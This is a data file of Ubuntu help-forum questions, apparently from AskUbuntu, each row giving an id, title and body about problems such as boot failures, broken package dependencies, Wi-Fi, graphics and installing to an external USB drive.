339232	identification of hdd by sata port number	how do i find out which motherboard sata port number is an hdd connected to ? we want to build a hdd copy software based on physical identification of sata .
339235	boot problem system stops ubuntu-gnome 13.04	message : give up waiting for root device ... . alert ! /dev/disk/by-uuid4ec71b51-5f7c ... does not exist dropping to a shell busybox v1.20 ... enter 'help ' for a list of built in commands . ( initramfs ) - hardware : msi760-gm amd fx6100 64bit i do n't know what to do . can anyone help me ? thanks i.a . henk kohn
339238	how to extract audio from webm ?	audio within mp4 and flv files is aac , and a proper container for that is m4a . so , in order to extract sound from mp4 and flv i use a command like gnome-terminal -e `` parallel avconv -i ' { } ' -map 0:1 -c : a copy ' { } .m4a ' -- % f '' and add it to thunar 's custom actions . more here and here . how to achieve that for webm ? ( i read here that the audio contained is vorbis . )
339240	apt-get install -f held packages	i am having trouble upgrading the packages in my ubuntu system . i followed the solution in the question here by using it i was able to troubleshoot the error i was encountering while doing dpkg -- configure -a by removing the broken packages from the file in /var/lib/dpkg/status but now after doing apt-get install -f i get the following error . please help . i dont know because will removing the below packages from the file will cause any problem in my system . apt-get install -f reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... failed . the following packages have unmet dependencies : apparmor : depends : initramfs-tools but it is not installed brltty : depends : initramfs-tools ( > = 0.40ubuntu30 ) but it is not installed console-setup : depends : initramfs-tools ( > = 0.85eubuntu12 ) but it is not installed dmsetup : depends : initramfs-tools but it is not installed kbd : depends : initramfs-tools but it is not installed linux-image-2.6.32-38-generic : depends : initramfs-tools ( > = 0.36ubuntu6 ) but it is not installed ntfs-3g : depends : initramfs-tools but it is not installed plymouth : depends : initramfs-tools but it is not installed udev : depends : initramfs-tools ( > = 0.92bubuntu63 ) but it is not installed watershed : depends : initramfs-tools but it is not installed e : error , pkgproblemresolver : :resolve generated breaks , this may be caused by held packages . e : unable to correct dependencies edit1 apt-get -- reinstall install initramfs-tools reading package lists ... done building dependency tree reading state information ... done the following new packages will be installed : initramfs-tools 0 upgraded , 1 newly installed , 0 to remove and 921 not upgraded . 1 not fully installed or removed . need to get 49.0kb of archives . after this operation , 372kb of additional disk space will be used . get:1 http : //in.archive.ubuntu.com/ubuntu/ precise-updates/main initramfs-tools 0.99ubuntu13.1 [ 49.0kb ] fetched 49.0kb in 9s ( 5,302b/s ) selecting previously deselected package initramfs-tools . ( reading database ... 140222 files and directories currently installed . ) unpacking initramfs-tools ( from ... /initramfs-tools_0.99ubuntu13.1_all.deb ) ... processing triggers for doc-base ... processing 1 changed doc-base file ( s ) ... registering documents with scrollkeeper ... processing triggers for man-db ... setting up initramfs-tools ( 0.99ubuntu13.1 ) ... cp : not writing through dangling symlink `/etc/initramfs-tools/modules' dpkg : error processing initramfs-tools ( -- configure ) : subprocess installed post-installation script returned error exit status 1 dpkg : dependency problems prevent configuration of watershed : watershed depends on initramfs-tools ; however : package initramfs-tools is not configured yet . dpkg : error processing watershed ( -- configure ) : dependency problems - leaving unconfigured no apport report written because the error message indicates its a followup error from a previous failure . errors were encountered while processing : initramfs-tools watershed e : sub-process /usr/bin/dpkg returned an error code ( 1 )
339244	how to use wi-fi through a login page ?	i have a thinkpad with ubuntu 13.04 ( raring ringtail ) . i found that whenever i try to connect to wi-fi in starbucks ( where a login page is needed ) , it never succeeds . the same thing happens when i try to log into wi-fi in college where login is also needed . the login page does not appear as it used to on windows . what is the problem and what information should i provide ?
339249	how to connect to internet after removing network manager ?	i am using ubuntu 12.04 . i deleted network manager and do not see both wireless and lan connection icons in the desktop , and for this reason i can not connect to the internet . any idea ?
339250	how to automatically set `` always on visible workspace '' for windows on particular monitor	in my dual monitor set up , i generally use my ( larger ) left hand monitor for working on . i 'll have a browser workspace , a text editor workspace , and email workspace and so on . however , the smaller right hand monitor is reserved for `` sticky '' things like my irc window , and my music player . currently i achieve this by manually setting `` always on visible workspace '' for all the windows i place on the right hand workspace , but i 'd like to know if there is a way to set it automatically for ones i place there , or if that is the kind of thing that is in the realm of a more wacky window manager . i suspect the answer is going to be `` use xmonad '' , but i 'd like to know for sure .
339251	create new gnome classic theme and config system to offer all users	i 'm trying to create new gnome classic theme ( gnome-session-fallback ) on ubuntu precise . i want to include it into system settings - > background menu to offer that configuration to all users . i 'm searching information related but all i find is related with gnome shell or unity . thank you for help .
339253	how can html5 ubuntu touch apps access camera and microphone ?	i am creating an app for ubuntu touch using html5 . i am opening my html page using qtwebkit 's webview and i really need to let the app take pictures and record audio , however , i ca n't access the webcam or microphone using the normal getusermedia/stream api like in chrome and firefox , and cordova does n't seem to be working at all . i need to know if there is any way to access camera and microphone input using html5 , and if not , can you please help me find a workaround like using native qml to take pictures and audio and using the output in the html parts of the app ?
339255	how do i make man pages open in a web browser ?	how can i make manpages ( from the man command ) open in a web browser for easier navigation ?
339259	present description tooltip when hovering the pointer on files	i wish to see a description of a file when mouse hovers over that file much like you get `` program name '' when you hover over an icon in launcher . how can i do it ? in my view there must be some css file to make this change and include the description . how to find the location of the css file ? example : when i hover over a file , named some `` project.css '' , suppose i set the required text to be displayed as `` main css file of the project '' , this text must be displayed if i hover over the file . i know this sounds over ambitious , but having such feature would be so awesome mainly if you do n't name your files correctly .
339264	ubuntu screen flickering after laptop repair	i own a dell vostro 3550 laptop which uses both windows 7 and ubuntu . the laptop broke a month ago and i called dell support to fix it . a small metallic clip was dislodged from the back lid and short-circuited `` something '' on the motherboard . i was n't present during repair so i do not know exactly what was roasted . after repair everything works fine on windows 7 but on ubuntu the mouse cursor and the windows environment are flickering . sometimes it stops for an hour or so but it reoccurs . i 've tried a fresh install of ubuntu along with fedora and funduntu but flickering is still present . my intuition says that its a hardware issue since i 've never had flickering problems in ubuntu ( currently run the 12.04 vostro 3550 distro ) , although i kind of spended a lot of time in order to setup vostro 3550 graphics to work properly . i want to investigate more before calling dell support again because windows 7 works flawlessly and it might be a drivers problem ( although i 've tried almost everything regarding ati drivers for ubuntu , disabled discrete card , disable integrated card etc . ) the graphics card are amd radeon 6630m and intel hd 3000 . any ideas on how to fix that problem ?
339266	how to install pyside in raring	what is the easiest way to install pyside in ubuntu 13.04 ? there is a link to a ppa in their binary packages section but it does not have packages for raring .
339278	how to retrieve or find missing pictures	i deleted by mistake a wallpaper to trash . i cut it out of trash and paste in to my `` pictures '' folder . but now when i go to the pictures folder , the picture is nowhere . its not even hidden . what can i do ? please assist .
339282	can a script resume after computer comes out of hibernation ?	i kept a perl script running and then forgot it and hibernated my laptop running ubuntu . when i restarted it , the script was seen to be running ( pleasant surprise ! ) . is this correct behaviour or did the computer not hibernate properly ? if this is a correct behaviour , how does it work , does it save program state ?
339285	if a bug has been flagged as invalid does that mean no solution will ever come ?	i have a lenovo thinkpad twist and i am having a recognized issue where the onboard touch pad and nipple do n't work on first boot but they do after restart . the full details ( from someone else who discovered this problem before me ) can be found here : https : //bugs.launchpad.net/ubuntu/+source/linux/+bug/1210748 while i understand that the finding in the bug report was that the bios may have caused the problem to appear its still is a problem that does n't happen if i run windows 8 . i guess i 'm just wondering if me and laptop have just been shown the door or if there 's still hope for a fix .
339289	keyboard command to change desktop	i am currently running ubuntu 13.04 on my laptop and i installed compiz-config in order to organize my workspace . in compiz-config , choosing general options , the last tab is desktop size . then there are three options , and the last one propose to change the number of desktops . i would like to have two differents desktops but i ca n't find how to switch between them . is there a shortcut to switch between these two ( non-virtual ) desktops ?
339296	ubuntu 13.10 , virtualbox 4.2.16r86992 , vm with bridge or host only network does not start	i set up bridge or host only netwrok in my vm . and when i start it i got error : failed to open a session for the virtual machine debian . vd : error verr_not_supported opening image file '/home/valery/debian 6 64-bit/debian 6 64-bit.vmdk ' ( verr_not_supported ) . failed to open/create the internal network 'hostinterfacenetworking-vboxnet0 ' ( verr_intnet_flt_if_not_found ) . failed to attach the network lun ( verr_intnet_flt_if_not_found ) . result code : ns_error_failure ( 0x80004005 ) component : console interface : iconsole { db7ab4ca-2a3f-4183-9243-c1208da92392 } could somebody help me ?
339298	conveniently schedule a command to run later ?	what 's a simple way to run a command , say , 8 hours from now ? i can think of this way : nohup bash -c `` sleep 28800 ; ./mycommand.sh '' & is there a more `` proper '' way ?
339303	can i get copies of ubuntu 13.04 on cd 's to give our free software club members ?	i want the new ubuntu 13.04 to give to our club members for free . can get them ? i have a club named 'free software club ' with 100+ members . we discuss free software , linux , python and give training .
339308	ubuntu firewall : apache only visible on lan	how can i add a rule to the ubuntu firewall that makes apache server only accessible from the internal lan ? ufw status ng @ ng-laptop-kv : ~ $ sudo ufw status estado : activo hasta acci贸n desde -- -- - -- -- -- -- -- - 80 allow anywhere 80 allow anywhere ( v6 )
339312	ubuntu 12.04 - boot problem !	i installed ubuntu 12.04 on my laptop , and i am having a problem with booting . when i turn on the computer , it first shows a purple screen ( like the one when ubuntu is loading ) and then black ( no blinking cursor ) and then nothing happens . using the power button , i turn off and then back on . the options open to select the kernel and the memory test , i choose the first ( kernel ) and then boot , but i ca n't always do that to boot the system . how can i boot the system normally ? any suggestions ?
339315	automatic wireless scan on startup/login and resume	i 'm running 12.04 on my macbook pro 5,5 , and my wi-fi is working fine , but i 'm having problems getting it to scan automatically at startup time . on first login i get a notification that i 'm disconnected , and no networks are listed in the network manager tray widget , even though enable wireless is ticked . if i go to the terminal and do a manual scan , network manager kicks in after a second or two , populates the list and connects automatically to a saved network if available . $ sudo iwlist wlan0 s i 've run the following commands immediately after startup for diagnosing the situation $ iwconfig $ sudo lshw -c network $ sudo lspci -nn | grep 0280 ( output here ) i 'm not an expert , but as far as i can tell the driver is loaded and everything is working , but network manager just does n't start a scan without a kick in the behind . i 've spent a lot of time searching around , but i ca n't seem to find anyone with the same issue . anyone know how i can resolve this ? thanks in advance .
339319	why is different the behavior of udisk and udisk2 in xubuntu for automounting usb2/3 drives ?	i found out that i was unable to automount hdd via usb3.0 in xubuntu 13.04 . at the same time usb2.0 flash card could be mounted automatically . i solved the problem by installing udisks . now thunar uses udisks2 to automount usb2.0 devices and udisks for usb3.0 . wan na know if this inconsistent behavior is due bad udisks2 xfce 4.10 integration or is it smth xubuntu-specific ?
339321	unable to run a command from usr/bin	here is what i have $ ls -al /usr/bin/scala lrwxrwxrwx 1 root root 33 aug 30 21:00 /usr/bin/scala - > /opt/scala/scala-2.10.1/bin/scala but $ scala -bash : /usr/bin/scala : permission denied how do i fix this ?
339330	how to play dvds which are encrypted ( the lord of the rings )	i 'm a totally newbie within linux ( programs - how to navigate through folders and so on - and commands as well - ... ) - but i think linux is very interesting as well . i have now made a virtually machine with oracle and have success with my hp printer . i have tried to find out how to play dvd which are encrypted ( i think ) . without success i have tried to use 'libdvdread4.2.0 ' because my thought was that this might be a possible missing . but honestly - i do n't know how to start downloading the right free software for decrypting dvds in ubuntu linux - and to make the install of the software . and i dont know how to search for the right software . so i will be really glad if someone can help the totally newbie . my system is ubuntu `` 12.04.2 alternate 64bit danish '' .
339334	package update error	i ca n't seem to get any updates installed . i keep getting the following errors . how do i solve this ? reading package lists ... building dependency tree ... reading state information ... correcting dependencies ... done the following packages were automatically installed and are no longer required : linux-headers-3.2.0-44-generic linux-headers-3.2.0-44 linux-image-3.2.0-44-generic use 'apt-get autoremove ' to remove them . the following extra packages will be installed : linux-server the following packages will be upgraded : linux-server 1 upgraded , 0 newly installed , 0 to remove and 117 not upgraded . 1 not fully installed or removed . need to get 0 b/1,734 b of archives . after this operation , 0 b of additional disk space will be used . do you want to continue [ y/n ] ? dpkg : dependency problems prevent configuration of linux-server : linux-server depends on linux-image-server ( = 3.2.0.45.54 ) ; however : version of linux-image-server on system is 3.2.0.52.62. linux-server depends on linux-headers-server ( = 3.2.0.45.54 ) ; however : version of linux-headers-server on system is 3.2.0.52.62. dpkg : error processing linux-server ( -- configure ) : dependency problems - leaving unconfigured errors were encountered while processing : linux-server
339342	how do i download always the latest version of the programs when i use apt-get install [ program ] ?	i tried to install the eclipse ide and arduino this way : sudo apt-get update sudo apt-get install arduino sudo apt-get install eclipse but come the version eclipse 3.8 and the arduino ide 1.0.3 and not the latest versions . would specify which version of the program when i use apt-get install ?
339353	how to minimize a fullscreen app ?	i would like to be able to minimize fullscreen applications using alt-tab , like on windows . it is irritating that i ca n't do it , because when i am playing a game and i have a message in skype , i ca n't read the message without quitting the game first . note that i do n't want to kill the application , just minimize it ( and show the desktop ) . is there an easy way for this ? i 'm using ubuntu 13.04 64 bit .
339354	`` ca n't alloc filename '' when executing mdb-export on a mounted file	i 've mounted a windows directory with cifs : sudo mount -t cifs //server/bases/some/path ~/mnt/data -o user=windomain/login % password this works : cp mnt/data/blabla/file.mdb . /usr/bin/mdb-export file.mdb tablename but this does n't : /usr/bin/mdb-export mnt/data/blabla/file.mdb tablename it fails with output ca n't alloc filename why ? how can i execute mdb-export on a mounted file without having to copy it locally first ?
339355	does this reformat my hard drive ?	i am thinking of changing from win8 to ubuntu and am nervous because i do not want to lose my data i have currently . does this reformat my drive ?
339364	libssl.so.10 : can not open shared object file : no such file or directory	im trying to use twobittofa , which is a small program released by the university of california santa cruz , that uncompresses large genome files and i get this error : error while loading shared libraries : libssl.so.10 : can not open shared object file : no such file or directory i tried searching for what package provides it . i switched from fedora which had 'yum provides ' but when looking for the ubuntu equivalent , i came across 'apt-file search ' but when i tried that i got a command not found error . how can i get this libssl file , and more generally , how can i search for what package provides a file so i can do this by myself in the future ?
339365	ubuntu 13.04 + touch screen : points , though does n't click	works well with nautilus and settings . other places : i tap , cursor points , no further action . guide me . i need it . what to do ?
339373	software to alert when caps lock is on	in my new samsung laptop there is no caps lock indicator , no light ... nothing . i was wondering whether there is any software is available that can display/alert to me whenever caps lock is on
339376	problems uninstalling ubuntu , trying to put xp back on	i have an acer aspire one zg5 netbook that came with windows xp . it was loaned to someone , who then put ubuntu on it . i know nothing about ubuntu , so i looked for information on this site for help . it walked me through the steps to uninstall ubuntu using the terminal . now the netbook boots to : error : unknown filesystem , grub rescue > i 've tried changing the bios and then booting with an xp cd but i keep getting a `` stop error '' . i do n't have an ubuntu live cd . when i type ls , it shows the following : hd0 hd0 , msdos5 hd0 , msdos1 is the ubuntu system gone now ?
339381	so is it true that hp printer no longer work with linux at all ?	here is my conversation with hp regarding scanners : 08/30/2013 07:34:15am agent ( janelle m. ) : `` hello , ken . '' 08/30/2013 07:34:22am ken schutter : `` hello '' 08/30/2013 07:35:06am agent ( janelle m. ) : `` ken , i appreciate your interest in hp products . '' 08/30/2013 07:35:40am ken schutter : `` hp is my preference for all printers because they work out of the box in linux . '' 08/30/2013 07:35:57am agent ( janelle m. ) : `` i am very sorry to inform you though , however , our scanners and all-in-one printers with scanning capability do not support linux anymore . '' 08/30/2013 07:36:32am ken schutter : `` too bad . hplip is no longer valid driver ? '' 08/30/2013 07:36:57am agent ( janelle m. ) : `` yes , it is no longer a valid driver , ken . i am sorry . '' 08/30/2013 07:37:14am ken schutter : `` i will try elsewhere . thanks '' 08/30/2013 07:37:27am session ended
339383	ca n't remove a directory or `cd` into a directory that exist	i can not seem to rm -r or even cd into a directory that clearly exist but i get the error no such file or directory . what 's going on ? relevant commands below . should i force this or what ? i would like to know why this is happening as well . root @ jaxsin : /var/www/camwright/core/components/databackup/dumps # ls -al total 24 drwxr-xr-x 2 root root 4096 aug 30 11:19 modx_camwright_2013_08_30__1377875941 drwxr-xr-x 2 root root 4096 aug 30 11:20 modx_camwright_2013_08_30__1377876001 drwxr-xr-x 2 root root 4096 aug 30 11:21 modx_camwright_2013_08_30__1377876062 drwxr-xr-x 5 www-data www-data 4096 aug 30 11:21 . drwxr-xr-x 7 www-data www-data 4096 aug 30 10:45 .. -rw-r -- r -- 1 www-data www-data 21 aug 30 10:45 readme.txt root @ jaxsin : /var/www/camwright/core/components/databackup/dumps # cd modx_camwright_2013_08_30__1377875941/ -su : cd : modx_camwright_2013_08_30__1377875941/ : no such file or directory root @ jaxsin : /var/www/camwright/core/components/databackup/dumps # rm -r modx_camwright_2013_08_30__1377875941/ rm : can not remove `modx_camwright_2013_08_30__1377875941/ ' : no such file or directory
339387	error loading operating system after i have installed ubuntu 12.04	steps that i have done : ( first os was windows xp ) i had 3 partitions , ntfs and fat , then i formatted the drive during ubuntu 12.04 partitioning . i have formatted the drive with ext4 and other one with ext3 and other as swap area . while partitioning i have mounted ext4 on / , second one on /boot , and third on /home/ . then i installed ubuntu 12.04 , and it installed properly . but after i closed the cd tray and restarted , the system is showing this error message : error loading operating system
339388	how do i arrange photos by visual similarities ?	i 'm looking for a software to arrange and view all my 30k pictures by similarities . definitely i wo n't tag them one by one ! i was looking for something similar to visolu2 ( an ipad app ) , or something like piximilar - but for hard drive . imagesorter ( a software made by the same people of visolu2 ) does the job , but i can only run it with wine + is no longer supported . i would prefer a software for linux . all suggestions are welcome .
339393	i want to bridge my ethernet to my wifi , but there is no ethernet port listed . what can i do ?	under network connections , i have no `` wired connection ''
339395	how do i view videos from a shared directory ?	i 've installed lubuntu 13.04 upon an old hp laptop , and it works great . unfortunately , when i try to access a shared directory on a pc inside my home network , on which ubuntu 12.04 is installed , i ca n't stream videos stored in there . first the problem was that with pcmanfm i was unable to access the directory , so i installed nemo and nautilus . with both i can view and copy files , but the videos ( or mp3 ) are unable to stream . i also tried with vlc but without luck . if i copy these files into the laptop with lubuntu , i can view them without problems . then , if i try to play a video file from the shared directory , vlc ( or any other video player ) opens regularly but the screen remain black and nothing is reproduced . any idea ?
339396	cache parsing error ( erreur d'ouverture du cache ) , how to fix ?	translation ( thanks to carnendil ) : i have a signal of error for some weeks , i can not make updates any more , and signal you the bug can you help me ? here is the received message of error : e : encountered a section with no package : header , e : problem with mergelist /var/lib/apt/lists/packages.medibuntu.org_dists_precise_free_i18n_translation-en , e : the package lists or status file could not be parsed or opened . original french text : j'ai un signal d'erreur depuis quelques semaines , je ne peux plus faire de mises ă jour , et pas non plus vous signaler le bug ... pouvez-vous m'aider ? voici le message d'erreur reă§u : e : encountered a section with no package : header , e : problem with mergelist /var/lib/apt/lists/packages.medibuntu.org_dists_precise_free_i18n_translation-en , e : the package lists or status file could not be parsed or opened .
339401	ubuntu 12.04 magic mouse connected and paired but not working	i have a problem with magic mouse . it was working for a time , but after i updated the system it wo n't work . it connects fine , pairs , the green light on the mouse lights up , and blueman says it 's connected and paired , but when i click or move the mouse nothing happens . the mouse is working fine on another pc . linux ubuntu 3.8.0-29-generic # 42~precise1-ubuntu smp wed aug 14 16:19:23 utc 2013 x86_64 x86_64 x86_64 gnu/linux lsmod | grep magic returns nothing . sudo lsinput | grep magic returns nothing , and before magic mouse was listed there in both of them .
339402	window manager and window manager tweaks guis are blank	i got to application menu - > settings - > settings manager - > window manager or window manager tweaks and both guis are blank . nothing pops up for me to adjust anything . i 'm running xubuntu 12.04 64-bit .
339403	why do i get `` wi-fi is disabled by hardware switch '' after upgrade to 13.04 ?	just got an asus 1015e with ubuntu 12.04 installed . decided to upgrade to 13.04 ( started by upgrading to 12.11 ) . did both upgrades with wireless no problem . when computer restarted with 13.04 , wifi was disconnected , and now says wi-fi is disabled by hardware switch . ran rfkill list , and it shows : phys as hardware switch blocked : yes . contacted asus customer service - they say no such thing as a hardware switch on the 1015e . any ideas to fix ?
339407	ubuntu minimal install font rendering	i installed ubuntu 13.04 using the minimal cd . then i installed gnome-shell and am slowly installing the applications i need as i need them . default font rendering on ubuntu is , in my opinion , one of the most important reasons to prefer ubuntu . i 'm probably being paranoid but are the font rendering details on my minimal install exactly the same as a default unity install ? i 'm guessing the answer is yes since same fontconfig packages are installed but i feel the need to check anyway .
339410	unable to boot ubuntu 13.04 alongside windows 8	http : //paste.ubuntu.com/6036784 i used boot repair commands on try ubuntu terminal . it said `` efi detected check options '' i used the recommended repair option . in the end it said `` buggy kernel detected , do you want to activate ( windows efi files will be saved and renamed ) ? '' after the reboot , i did n't get the option to choose the os . it justy goes straight to windows 8 . what could be the problem ?
339412	how to make iso image of current logged in system to use it as future installation media	i have just installed ubuntu 13.04 and due to installation of faulty media and different programs , my ubuntu crashed more than 7 times in last 3 days , nvidia was the leading cause in 7 failure , and each time i had to install approx 600-700 mb of different application for my suite , like qt creator and virtual box , and different other apps . now , i do n't want to trouble myself to install them again , all i want is to make image of my current installation , so that all i have to do is burn current iso in bootable pen drive and install them as it is . please give me option of verified source list download only.. i recently visited remastersys , and the text written on front page seems like to me , it might have been compromised , and if it is the case , than may be his package is backdoored , so i do n't want to risk myself in using such binary . are there valid , verified and secured way to make my current installation into iso image , so that it can be used to burn it into some usb for bootable purpose . update i do n't want to download again any of already downloaded file , all i want is to use is same downloaded file . important does ubuntu has no such built in verified application which can do some sort of system-restore or create backup of whole system , so that there is no re-installation required whenever system is in trouble thanks
339415	ubuntu tweak does n't seem to work for me in xubuntu 12.04 64-bit	i 've had ubuntu tweak installed for months now . however , there seems to be a list of things that do n't seem to work when i change them in ubuntu tweak . no matter what i do , ubuntu tweak will not make the changes that i select . tweaks - > sound : does not work tweaks - > theme : no matter what theme i choose for any of the settings it does not change it in my system tweaks - > login settings : does not change anything . does n't even show the current cursor them that i am using as i am writting this and going through ubuntu tweak , all of a sudden my panels and cairo-dock just disappear . alt-tab does n't even work either and wo n't let me switch between applications .
339416	is it possible to install the ubuntu sdk in gentoo ?	is it possible to install the ubuntu sdk and all the tools needed to develop apps for ubuntu in another linux distribution , lets say : sabayon ( a gentoo derivative ) , or any other linux distro that is not ubuntu ?
339427	is it possible to install ubuntu through network ?	i would like to install ubuntu for almost 120 users . but it 's very difficult in using usb and drives . please suggest ... .
339428	how to upgrade ubuntu from 12.10 to 13.4 without lossing anything ?	well title says all most everything . i am using ubuntu 12.10 . installed using windows installer . is there anyway to upgrade it ? any how much data i will lose ? i have installed some softwares and there is some docs .
339439	ca n't connect samsung galaxy gio to my ubuntu 13.04	when i connect my mobile phone ubuntu does n't recognize it .
339440	graphics performance reduced	i 've installed ubuntu recently . i love gaming on pc and i am trying out ubuntu . but ... i 've been having a problem . my graphics card performance had been reduced in this os . i used to run games in windows that i can not in ubuntu because of this . here is all the information about my graphics card 01:00.0 vga compatible controller : advanced micro devices , inc. [ amd/ati ] rv710/m92 [ **mobility radeon hd 4530/4570/545v** ] ( prog-if 00 [ vga controller ] ) subsystem : acer incorporated [ ali ] device 0212 flags : bus master , fast devsel , latency 0 , irq 45 memory at c0000000 ( 32-bit , prefetchable ) [ **size=256m** ] i/o ports at 5000 [ size=256 ] memory at d6200000 ( 32-bit , non-prefetchable ) [ size=64k ] expansion rom at d6220000 [ disabled ] [ size=128k ] capabilities : < access denied > kernel driver in use : radeon kernel modules : radeon as you might have seen there ... it says my graphics ram is 256mb ... it says the same in steam . but my graphic memory had always been 512mb ... bios is there to confirm . but someway , it 's saying that
339444	why do i have 32b ubuntu after installing the 64b version ?	to keep things simple i downloaded the 64b version of ubuntu to try out on a spare computer but it turns out i have a 32b version ? i even made sure to double check with the website and sure enough i downloaded the 64b version : `` ubuntu-12.04.3-desktop-amd64.iso '' and i also confirmed that my machine is actually 64b . so does anyone have any ideas as to why i have the wrong version ? and is there a way i can get the 64b version without completely starting over ? `` uname -i '' displays `` i386 '' . and when i go into the system settings and details it says i have `` os type : 32-bit ''
339453	ubuntu not enough space on aws ec2	i have 25gb volume on ec2 . os is ubuntu 12.04 lts . i can connect to it , but can not even write 1kb . i tried to delete some files and write again - the same result - not enough space . i tried to check free space and got this error . df -h df : can not read table of mounted file systems : no such file or directory then i tried to get directory sizes . it seems that only 13gb from 25gb is full : du -h -- max-depth=1 18m ./boot 16k ./lost+found 4.0k ./tmp 83m ./lib 192k ./home 8.7m ./bin 4.0k ./selinux 4.0k ./opt 100k ./root 8.0k ./dev du : can not access `./proc/1312/task/1312/fd/4 ' : no such file or directory du : can not access `./proc/1312/task/1312/fdinfo/4 ' : no such file or directory du : can not access `./proc/1312/fd/4 ' : no such file or directory du : can not access `./proc/1312/fdinfo/4 ' : no such file or directory 0 ./proc 7.9m ./sbin 434m ./usr 172k ./run 13g ./var 0 ./sys 4.0k ./srv 4.0k ./mnt 4.0k ./lib64 4.0k ./media 5.8m ./etc 13g . mounts mount sysfs on /sys type sysfs ( rw , nosuid , nodev , noexec , relatime ) proc on /proc type proc ( rw , nosuid , nodev , noexec , relatime ) udev on /dev type devtmpfs ( rw , relatime , size=1912272k , nr_inodes=478068 , mode=755 ) devpts on /dev/pts type devpts ( rw , nosuid , noexec , relatime , gid=5 , mode=620 , ptmxmode=000 ) tmpfs on /run type tmpfs ( rw , nosuid , relatime , size=768100k , mode=755 ) /dev/disk/by-label/cloudimg-rootfs on / type ext4 ( rw , relatime , user_xattr , acl , barrier=1 , data=ordered ) none on /sys/fs/fuse/connections type fusectl ( rw , relatime ) none on /sys/kernel/debug type debugfs ( rw , relatime ) none on /sys/kernel/security type securityfs ( rw , relatime ) none on /run/lock type tmpfs ( rw , nosuid , nodev , noexec , relatime , size=5120k ) none on /run/shm type tmpfs ( rw , nosuid , nodev , relatime ) how can i solve this problem ?
339455	bought a new wd 1tb elements usb3 , i wanted to install xubuntu 12.04 in it but it just wo n't work ?	current situation is : my laptop internal hard disk is fried . i have a usb stick of xubuntu-12.04 i have a live cd of ubuntu 11.10 . i have another 16 gb hp pendrive where there is an xubuntu 12.04 installed , which i am currently using as my only hard drive and running the system . i bought a new wd 1tb elements usb-3 , which is fine when i connect to any system , it works fine , i can save data.. do whatever . my new wd hard drive is detected in bios when booting.. even i can choose it as my first boot device too . my goal is : to install a linux on my external hard drive `` western digital elements 1tb with usb-3 '' and run my system without an internal hard , like the way i am doing it now with my pen drive , i wan na do it with my wd external . problems i was facing initially ( day before yesterday ) : i had inserted ubuntu 11.10 live cd [ it does n't matter whether 11.10 is not supported the cd is fine ] . i had connected my wd external . bootable device list shows both of the above and i selected my cd as first and wd second . ubuntu appears with option ( i ) try ( ii ) install , i selected ( i ) then in another time ( ii ) also.. does n't matter problem is same i am describing below : after choosing any of try/install appears a nice black screen that usually is not a problem.. but after waiting for several minutes i see '' udevd [ 124 ] : timeout : killing '/sbin/blkid -o udev -p /deb/sdc1 ' [ 269 ] '' i tried many times so something like that appear always may be /sdc becomes /sda or /sdb .. but this kind of `` timeout '' error ! but it never happens if i use anything else.. any other `` pen drive '' instead of wd hard drive for installing ubuntu . in fact i have installed ubuntu in another pendrive same way and i faced no such problem . so i googled and found : wd external hard drives are updated with some new `` 4k '' sector technology , i do n't understand much so i wo n't explain . thy say some sort of `` alignment '' is necessary during partitioning , and newly bought wd wo n't boot or will be slow if i do n't do this new partitioning with proper alignment . what i did yesterday -- - i followed links like this one -- '' http : //ubuntuforums.org/showthread.php ? t=1768635 '' and created partitions using `` fdisk '' and started first sector at 2048 and endpoints also a multiple of 8 and each partitions separated by space multiple of 8 . then i finally formatted the partitions using gparted to two big `` ext4 '' and smaller `` swaps '' my partition tables are big so i have pasted at the end of this question . i went on and did more gymnastics [ describing below ] -- i gave up ubuntu 11.10 and started with a fine perfect `` usb live stick xubuntu12.04 '' and faced same `` timeout '' problem . then i applied a new idea ... i removed the wd hard drive and using pndrive-1 as my hard disk and pendrive-2 as usb xubuntu livestick ... i opened xbuntus '' try xubuntu 12.04 without installing '' then when trying it ... i inserted my wd external ... and it perfectly mounted all the partition , i can open the partitions and see whats inside ... life is fine . then in the desktop of i clicked ... `` install xubuntu icon '' and it started ... it asked me to unmount the wd partitions otherwise i wo n't be able to repartition these during intsallation so i allowed xubuntu to unmount but the wd is still connected . installation started.. everything went well.. finally i was able to install xubuntu in one of my partition of wd and installation completed saying `` now restart to run newly installed xubuntu bla bla bla '' when i restarted and chosen newly installed xubuntu drive that is wd as my first boot device.. and the message during booting showed ... `` no bootable or something like that [ do n't remember ] found insert bootable media and press any key ... '' . i then removed every cd pendrive everything except this wd hard driv ... it still displayed âinsert bootable media ... and press ... '' i gave up and started computer with xubuntu installed hp pendrive ... and then after startup.. i connected wd external hdd ... and in one of its partition i found.. it contains all the files of xubuntu installed ... everything ... but why my system does n't recognize it and `` times out '' i have no clue ... . this is the best way i could explain all my problems ... outside this i neither know nor understand . this is it and this is all . please help ... i just need my wd hard drive [ external 1tb ] to work as my main hard disk with ubuntu ... i need step by step instructions to achieve that ... . i do n't have reputations to upload image so copy pasting : xyz @ xyx : ~ $ sudo -i root @ atanupndrive : ~ # fdisk -lu /dev/sd sda sda1 sda2 sda5 sdb sdb1 sdb2 sdb3 sdb5 sdb6 root @ atanupndrive : ~ # fdisk -lu /dev/sda disk /dev/sda : 16.3 gb , 16257318912 bytes 255 heads , 63 sectors/track , 1976 cylinders , total 31752576 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00013fd3 device boot start end blocks id system /dev/sda1 * 2048 27584511 13791232 83 linux /dev/sda2 27586558 31752191 2082817 5 extended /dev/sda5 27586560 31752191 2082816 82 linux swap / solaris root @ xyz : ~ # fdisk -lu /dev/sdb disk /dev/sdb : 1000.2 gb , 1000202043392 bytes 255 heads , 63 sectors/track , 121600 cylinders , total 1953519616 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x000022db device boot start end blocks id system /dev/sdb1 2048 61032447 30515200 82 linux swap / solaris /dev/sdb2 122094856 1953517566 915711355+ 5 extended /dev/sdb3 61032448 122093567 30530560 82 linux swap / solaris /dev/sdb5 * 122110065 1037798999 457844467+ 83 linux /dev/sdb6 1037799063 1953503999 457852468+ 83 linux partition table entries are not in disk order
